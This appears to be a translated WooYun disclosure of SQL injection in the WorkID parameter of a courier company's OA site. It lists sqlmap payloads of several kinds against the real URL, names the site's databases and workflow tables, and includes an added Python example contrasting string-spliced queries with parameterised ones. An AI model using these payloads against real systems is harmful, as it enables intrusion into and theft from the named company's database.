
Vulnerability summary

Defect ID: wooyun-2015-0151617

Title: SQL injection on a 优速快递 (UC Express) site (DBA privileges / UNION possible)

Vendor: 优速快递

Author: 路人甲

Submitted: 2015-11-04 17:40

Fix time: 2015-12-19 17:42

Published: 2015-12-19 17:42

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-04: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-12-19: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

优速物流 (UC Express logistics) is a professional courier company providing domestic express delivery, freight, customs declaration and inspection, cash on delivery, high-value shipment and other services.

Detailed description:

Injection point: the WorkID parameter

http://oa.uc56.com/UCOA/WF/WorkOpt/OneWork/CH.aspx?FK_Node=%27&WorkID=51858&FK_Flow=129


Parameter: WorkID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: FK_Node=7&WorkID=51858 AND 5295=5295&FK_Flow=129

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: FK_Node=7&WorkID=51858 AND 9785=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9785=9785) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)))&FK_Flow=129

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: FK_Node=7&WorkID=(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6955=6955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113))&FK_Flow=129

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: FK_Node=7&WorkID=51858;WAITFOR DELAY '0:0:5'--&FK_Flow=129

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: FK_Node=7&WorkID=51858 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(76)+CHAR(121)+CHAR(110)+CHAR(66)+CHAR(99)+CHAR(108)+CHAR(77)+CHAR(88)+CHAR(86)+CHAR(102)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113),NULL,NULL,NULL-- &FK_Flow=129
---
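The sqlmap output above shows that the numeric WorkID parameter is concatenated straight into a SQL statement, which is why a boolean condition appended to it (5295=5295 versus a false one) changes what the page returns. The following is an added example, not code from the report or from the OA application: it reproduces that defect in miniature and sets the fix beside it. The WF_GenerWorkFlow table name is taken from the table list in the report, but its columns and rows are constructed here, and sqlite3 stands in for the site's Microsoft SQL Server so the example runs offline; the lookup functions are hypothetical stand-ins for the page's own data access code.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the workflow table (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE WF_GenerWorkFlow (WorkID INTEGER, FK_Flow TEXT, Title TEXT)"
    )
    conn.executemany(
        "INSERT INTO WF_GenerWorkFlow VALUES (?, ?, ?)",
        [
            (51858, "129", "expense claim"),
            (51859, "129", "leave request"),
            (51860, "130", "purchase order"),
        ],
    )
    return conn


def lookup_vulnerable(conn, work_id: str):
    """The defect class in the report: the raw request value becomes SQL text.

    Whatever follows the number is parsed as part of the WHERE clause, so an
    appended condition (true or false) steers the result set. That observable
    difference is exactly what the boolean-based blind detection above relies on.
    """
    sql = "SELECT WorkID, Title FROM WF_GenerWorkFlow WHERE WorkID=" + work_id
    return conn.execute(sql).fetchall()


def is_valid_work_id(work_id: str) -> bool:
    """WorkID is a numeric identifier: accept only a plain decimal integer."""
    return re.fullmatch(r"\d{1,10}", work_id) is not None


def lookup_hardened(conn, work_id: str):
    """Validate the type first, then bind the value instead of splicing it in.

    With a bound parameter the database receives the query structure and the
    value separately, so no input can alter the statement; the integer check
    additionally rejects anything that is not an identifier before it reaches
    the database at all.
    """
    if not is_valid_work_id(work_id):
        raise ValueError("WorkID must be a positive integer")
    sql = "SELECT WorkID, Title FROM WF_GenerWorkFlow WHERE WorkID=?"
    return conn.execute(sql, (int(work_id),)).fetchall()


def compare(work_id: str):
    """Return (rows from the vulnerable path, rows or error from the hardened path)."""
    vulnerable = lookup_vulnerable(make_db(), work_id)
    try:
        hardened = lookup_hardened(make_db(), work_id)
    except ValueError as exc:
        hardened = str(exc)
    return vulnerable, hardened


if __name__ == "__main__":
    # Legitimate value, then the true and false boolean probes from the report.
    for value in ("51858", "51858 AND 5295=5295", "51858 AND 5295=5296"):
        print(repr(value), "->", compare(value))
```

The vulnerable path returns one row for both the plain value and the true probe and no rows for the false probe, which is the behavioural difference an injection scanner measures; the hardened path serves the plain value and refuses both probes before any SQL is executed. In the real application the same two steps apply: parse WorkID as an integer in the .aspx handler and pass it to SQL Server through a SqlParameter rather than string concatenation.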


All databases:

available databases [8]:
[*] Android_db
[*] ccflow
[*] ccflowdemo
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ucsoa


Tables in the ccflow database:

SELECT name from SysObjects where type='U' and name not like 'ND%' [1
[*] CN_Area
[*] CN_City
[*] CN_PQ
[*] CN_Product
[*] CN_SF
[*] HungUpWork
[*] InformWork
[*] Items_detail
[*] Port_Unit
[*] Pub_DayScop
[*] Pub_ND
[*] Pub_NY
[*] Pub_YF
[*] SF_AmountClassfiy
[*] SF_Bank
[*] SF_SQLC
[*] SF_TxfClassfiy
[*] SF_ZCSQLX
[*] sqlmapoutput
[*] Sys_AccessToken
[*] Sys_CField
[*] Sys_Contrast
[*] Sys_DBSimpleNoName
[*] Sys_DefVal
[*] Sys_DocFile
[*] Sys_EnCfg
[*] Sys_EnsAppCfg
[*] Sys_EnsRef
[*] Sys_EnumMain
[*] Sys_FileManager
[*] Sys_FileType
[*] Sys_FrmAttachmentDB
[*] Sys_FrmBtn
[*] Sys_FrmEleDB
[*] Sys_FrmEvent
[*] Sys_FrmImgAth
[*] Sys_FrmLab
[*] Sys_FrmLine
[*] Sys_FrmLink
[*] Sys_FrmRB
[*] Sys_FrmSort
[*] Sys_GloVar
[*] Sys_GroupEnsTemplate
[*] Sys_GroupField
[*] Sys_M2M
[*] Sys_MapAttr
[*] Sys_MapData
[*] Sys_MapDtl
[*] Sys_MapExt
[*] Sys_MapFrame
[*] Sys_MapM2M
[*] Sys_RptRefLink
[*] Sys_RptTemplate
[*] Sys_Serial
[*] Sys_SFTable
[*] Sys_UserRegedit
[*] TA_MailDtl
[*] TA_SMS
[*] UC01
[*] UC_BX
[*] UC_GCLX
[*] UC_Lease_fk
[*] UC_Procurement
[*] UC_Project
[*] UC_UpdateLeave
[*] UCBX_MX
[*] V_FlowData1
[*] V_WF_Data
[*] WF_Bill
[*] WF_BillTemplate
[*] WF_BillType
[*] WF_CCDept
[*] WF_CCEmp
[*] WF_CCList
[*] WF_CCStation
[*] WF_CHOfFlow
[*] WF_CHOfNode
[*] WF_Cond
[*] WF_DataApply
[*] WF_DeptFlowSearch
[*] WF_Direction
[*] WF_Emp
[*] WF_FAppSet
[*] WF_FileManager
[*] WF_FlowEmp
[*] WF_FlowNode
[*] WF_FlowSort
[*] WF_ForwardWork
[*] WF_FrmNode
[*] WF_GenerFH
[*] WF_GenerWorkerlist
[*] WF_GenerWorkFlow
[*] WF_LabNote
[*] WF_Listen
[*] WF_NodeDept
[*] WF_NodeEmp
[*] WF_NodeFlow
[*] WF_NodeReturn
[*] WF_NodeStation
[*] WF_RememberMe
[*] WF_ReturnWork
[*] WF_SelectAccper
[*] WF_Task
[*] WF_Track
[*] WF_TurnTo

Proof of vulnerability:

DBA privileges:

[image: 1.jpg]

Fix recommendation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused